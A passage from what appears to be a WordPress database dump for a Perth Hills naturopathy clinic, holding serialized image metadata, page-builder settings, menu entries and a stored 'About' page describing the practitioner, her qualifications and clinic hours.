ve--tablet\";a:4:{s:4:\"file\";s:21:\"IMG_3908-980x1470.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:20:\"IMG_3908-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1620471947\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"49\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_3908.jpg\";}'),(349,150,'_wp_attached_file','2021/05/IMG_3908-1-scaled.jpg'),(350,150,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:29:\"2021/05/IMG_3908-1-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"IMG_3908-1-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"IMG_3908-1-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"IMG_3908-1-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:24:\"IMG_3908-1-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:23:\"IMG_3908-1-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:24:\"IMG_3908-1-1080x1620.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:24:\"IMG_3908-1-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:24:\"IMG_3908-1-1280x1920.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:23:\"IMG_3908-1-980x1470.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:22:\"IMG_3908-1-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1620471947\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"49\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"IMG_3908-1.jpg\";}'),(351,151,'_wp_attached_file','2021/05/IMG_3973-scaled.jpg'),(352,151,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:27:\"2021/05/IMG_3973-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_3973-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_3973-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_3973-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_3973-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_3973-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_3973-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:20:\"IMG_3973-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:21:\"IMG_3973-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:20:\"IMG_3973-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:20:\"IMG_3973-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:22:\"IMG_3973-1080x1620.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:20:\"IMG_3973-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:22:\"IMG_3973-1728x1800.jpg\";s:5:\"width\";i:1728;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:22:\"IMG_3973-1280x1920.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"IMG_3973-980x1470.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:20:\"IMG_3973-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1620474630\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_3973.jpg\";}'),(353,152,'_wp_attached_file','2021/05/IMG_3912-scaled.jpg'),(354,152,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:27:\"2021/05/IMG_3912-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_3912-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_3912-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_3912-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_3912-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_3912-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_3912-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:20:\"IMG_3912-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:21:\"IMG_3912-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:20:\"IMG_3912-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:20:\"IMG_3912-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:22:\"IMG_3912-1080x1620.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:20:\"IMG_3912-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:22:\"IMG_3912-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:22:\"IMG_3912-1280x1920.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"IMG_3912-980x1470.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:20:\"IMG_3912-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1620471992\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_3912.jpg\";}'),(355,27,'_et_pb_built_for_post_type','page'),(356,27,'_et_pb_ab_subjects',''),(357,27,'_et_pb_enable_shortcode_tracking',''),(358,27,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"27\" /]'),(359,27,'_et_pb_custom_css',''),(360,27,'_et_pb_gutter_width','3'),(361,27,'_thumbnail_id','0'),(362,27,'_global_colors_info','{}'),(363,27,'_et_pb_first_image',''),(364,27,'_et_pb_truncate_post','<p><div class=\"et_d4_element et_pb_section et_pb_section_0 et_pb_with_background et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_0 et_pb_equal_columns et_block_row\">\n <div class=\"et_d4_element et_pb_column_3_5 et_pb_column et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_0 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Meet Mel.</div>\n </div><div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_1 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. <br />\nShe has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. <br />\nMel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. <br />\n </div>\n </div>\n </div><div class=\"et_d4_element et_pb_column_2_5 et_pb_column et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_image et_pb_image_0\">\n \n \n \n \n <span class=\"et_pb_image_wrap \"><img fetchpriority=\"high\" decoding=\"async\" width=\"1079\" height=\"1346\" src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" alt=\"\" title=\"Screenshot_20231123_121727_Instagram\" srcset=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg 1079w, https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram-980x1223.jpg 980w, https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram-480x599.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1079px, 100vw\" class=\"wp-image-401\" /></span>\n </div>\n </div>\n \n \n \n \n </div><div class=\"et_d4_element et_pb_row et_pb_row_1 et_pb_equal_columns et_block_row\">\n <div class=\"et_d4_element et_pb_column_2_5 et_pb_column et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_image et_pb_image_1\">\n \n \n \n \n <span class=\"et_pb_image_wrap \"><img decoding=\"async\" width=\"1079\" height=\"1346\" src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" alt=\"\" title=\"Screenshot_20231123_121916_Instagram\" srcset=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg 1079w, https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram-980x1223.jpg 980w, https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram-480x599.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1079px, 100vw\" class=\"wp-image-402\" /></span>\n </div>\n </div><div class=\"et_d4_element et_pb_column_3_5 et_pb_column et_pb_column_3 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_2 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n \n \n \n </div><div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_3 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</p>\n<p>Certifications: <br />\nBachelor of Health Science (Naturopathy) <br />\nBachelor of Science (Biological Science) <br />\nAccredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</p>\n<p>Professional memberships: <br />\nAustralian Natural Therapist’s Association (ANTA)</p></div>\n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div><div class=\"et_d4_element et_pb_section et_pb_section_1 et_pb_with_background et_pb_section_parallax et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_2 et_block_row\">\n <div class=\"et_d4_element et_pb_column_4_4 et_pb_column et_pb_column_4 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_4 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Clinic info</div>\n </div>\n </div>\n \n \n \n \n </div><div class=\"et_d4_element et_pb_row et_pb_row_3 et_block_row\">\n <div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_5 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Location<br />\nKalamunda & online</div>\n </div>\n </div><div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_6 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_6 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n \n </div><div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n <a class=\"et_pb_button et_d4_element et_pb_button_0 et_pb_bg_layout_dark et_block_module\" href=\"https://verdenaturopathy.com.au/bookings\">Make a booking</a>\n </div>\n </div><div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_7 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_7 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Clinic Hours<br />\nTues/Wed: 9am-4pmThurs: 11am-7pmSaturday: 9:30am-1pm<br />\n </div>\n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div></p>\n'),(735,503,'_wp_attached_file','2025/10/square-image.jpg'),(736,503,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:24:\"2025/10/square-image.jpg\";s:8:\"filesize\";i:64269;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"square-image-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5456;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"square-image-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22913;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"square-image-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2527;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"square-image-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16116;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:24:\"square-image-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7062;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:25:\"square-image-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21980;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:24:\"square-image-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7153;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:24:\"square-image-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9382;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:26:\"square-image-1080x1080.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24600;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:24:\"square-image-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8586;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:24:\"square-image-980x980.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21592;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:24:\"square-image-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9383;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(737,504,'_wp_attached_file','2025/10/square-image.png'),(738,504,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:24:\"2025/10/square-image.png\";s:8:\"filesize\";i:78046;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"square-image-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4409;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"square-image-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19580;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"square-image-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2135;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"square-image-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13105;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:24:\"square-image-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5760;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:25:\"square-image-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17934;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:24:\"square-image-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5777;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:24:\"square-image-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8513;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:26:\"square-image-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20438;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:24:\"square-image-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6934;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:24:\"square-image-980x980.png\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17932;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:24:\"square-image-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7971;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(636,424,'_edit_lock','1743509127:1'),(632,28,'_edit_last','1'),(633,28,'_et_pb_post_hide_nav','default'),(634,28,'_et_pb_page_layout','et_right_sidebar'),(635,28,'_et_pb_side_nav','off'),(637,425,'_menu_item_type','post_type'),(638,425,'_menu_item_menu_item_parent','0'),(639,425,'_menu_item_object_id','424'),(640,425,'_menu_item_object','page'),(641,425,'_menu_item_target',''),(642,425,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(643,425,'_menu_item_xfn',''),(644,425,'_menu_item_url',''),(645,424,'_edit_last','1'),(646,424,'_aioseo_title','#post_title #separator_sa 